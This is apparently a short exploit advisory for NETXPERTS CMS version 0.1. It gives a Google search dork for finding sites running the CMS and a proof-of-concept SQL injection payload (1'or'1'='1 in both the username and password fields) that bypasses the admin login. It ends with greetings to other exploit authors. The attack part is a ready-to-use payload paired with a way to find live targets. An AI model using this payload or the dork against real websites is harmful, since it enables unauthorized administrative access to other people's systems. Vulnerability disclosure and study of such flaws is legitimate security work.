NETXPERTS CMS version 0.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
2d1ca320e3b663ac1f4ccab2f0fc1872177117ee2e48f1f7e5edb27711b24dc0
====================================================================================================================================
| # Title : NETXPERTS-CMS v0.1 Auth By Pass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Vendor : http://netxperts.in/ |
| # Dork : "Designed by NETXPERTS" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use payload : user : 1'or'1'='1 & Pass : 1'or'1'='1
[+] https://127.0.0.1/sivasudartravels/admin/production.php
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================